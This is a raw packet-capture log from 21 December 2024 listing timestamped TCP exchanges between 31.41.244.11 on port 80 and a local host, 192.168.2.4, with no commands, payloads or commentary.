                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.943567038 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.943703890 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.943759918 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.944852114 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.944967031 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.945950031 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.946005106 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.946199894 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.947134972 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.947185993 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.947251081 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.948338032 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.948385000 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.948400974 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.948448896 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.949575901 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:35.952389956 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.079850912 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.079987049 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.080408096 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.080431938 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.080569029 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.080626011 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.081659079 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.081738949 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.081803083 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.082711935 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.082870007 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.082936049 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.083966970 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.084212065 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.084275007 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.085139990 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.085314035 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.086268902 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.086333990 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.086422920 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.087399006 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.087466002 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.087590933 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.088399887 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.088691950 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.088835955 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.088901043 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.089961052 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.090147018 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.090212107 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.090950966 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.091108084 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.091173887 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.092114925 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.092288017 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.092355013 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.093324900 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.093494892 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.094482899 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.094559908 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.094634056 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.095654964 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.095725060 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.095803022 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.096405029 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.096853971 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.097002983 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.097078085 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.098094940 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.098247051 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.098314047 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.099215984 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.099356890 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.099436045 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.100457907 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.100567102 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.101558924 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.101635933 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.101727009 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.102708101 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.102778912 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.102893114 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.103898048 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.103972912 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.104044914 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.104407072 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.105077028 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.105206966 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.105281115 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.106235027 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.106406927 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.106479883 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.107429981 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.107592106 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.107666969 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.108593941 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.108768940 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.109422922 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.109767914 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.109900951 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.109921932 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.110035896 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.110982895 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.111068964 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.111123085 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.111222982 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.112155914 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.112255096 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.112273932 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.112396002 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.113315105 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.113385916 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.113466024 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.113527060 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.114466906 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.114685059 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.114775896 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.115642071 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.115709066 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.115823030 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.115888119 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.116873026 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.116936922 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.117044926 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.117105961 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.118061066 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.118139982 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.118240118 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.118299961 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.119262934 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.119358063 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.119441032 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.119503021 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.120404005 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.120558023 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.120626926 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.121607065 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.121649981 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.121721029 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.121757984 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.122862101 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.122908115 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.122982979 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.123023033 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.124094963 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.124141932 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.124221087 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.124263048 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.125194073 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.125240088 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.125313997 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.125350952 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.126256943 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.126305103 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.126394033 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.126432896 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.127566099 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.127609968 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.127779961 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.127885103 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.128725052 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.128794909 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.128879070 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.128954887 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.129793882 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.129837990 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.130002022 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.130307913 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.130954981 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.131123066 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.131169081 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.132155895 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.132203102 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.132280111 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.132319927 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.133310080 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.133474112 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.133517027 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.134489059 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.134531021 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.134615898 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.134659052 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.135679007 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.135725975 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.135809898 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.135853052 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.137053967 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.137096882 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.137181044 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.137232065 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.138073921 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.138170004 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.138226986 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.138273001 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.139219046 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.139265060 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.139344931 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.139386892 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.140408039 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.140525103 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.140568972 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.141505957 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.141550064 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.272002935 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.272226095 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.272286892 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.272510052 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.272701025 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.272752047 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.273710012 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.273771048 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.273885965 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.274194002 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.274873018 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.274920940 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.275084972 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.275122881 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.276283026 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.276335001 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.276546955 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.276629925 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.277439117 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.277544022 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.277587891 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.278424025 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.278475046 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.278559923 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.278619051 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.279659986 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.279707909 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.279759884 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.279798985 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.280745029 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.280798912 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.280915022 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.280960083 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.282042980 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.282094002 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.282175064 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.282322884 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.283215046 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.283257008 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.283370972 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.283411980 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.284379959 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.284526110 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.284543037 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.284571886 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.285605907 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.285645962 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.285715103 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.285752058 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.286626101 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.286668062 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.286815882 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.286855936 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.287828922 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.287870884 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.287961960 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.288002014 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.289031029 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.289088964 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.289159060 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.289196968 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.290146112 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.290188074 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.290307045 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.290344954 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.291456938 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.291498899 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.291733027 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.291771889 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.292624950 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.292747021 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.293761015 CET804979731.41.244.11192.168.2.4
